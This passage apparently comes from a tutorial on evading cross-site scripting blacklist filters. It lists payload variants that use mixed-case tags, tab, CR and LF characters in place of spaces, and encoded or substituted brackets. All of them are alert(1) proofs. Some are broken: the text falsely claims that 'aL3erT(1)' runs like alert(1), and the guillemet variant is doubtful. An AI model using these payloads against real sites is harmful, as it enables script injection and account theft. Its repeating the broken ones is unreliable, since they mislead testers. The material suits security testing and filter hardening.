A good trick is to slightly modify the tag names used in the payload string, for example, for a black list it is not the same next lines:

    <script>alert(1)</script>
    <ScrIPt>aL3erT(1)</ScrIPT>

Browsers will show the code in the same way, but for some filters this is not a malicious string.

Another trick is to modify the spaces with other characters, to avoid the filters, as here:

    <img/onerror=alert(1) src=a>
    <img[%09]onerror=alert(1) src=a>
    <img[%0d]onerror=alert(1) src=a>
    <img[%0a]onerror=alert(1) src=a>
    <img/"onerror=alert(1) src=a>
    <img/'onerror=alert(1) src=a>

Another trick is to modify the brackets, using encoding techniques or just simply modifying them with accepted values:

    %253cimg%20onerror=alert(1)%20src=a%253e
    «img onerror=alert(1) src=a»
    <<script>alert(1);//<</script>
    <script<{alert(1)}/></script>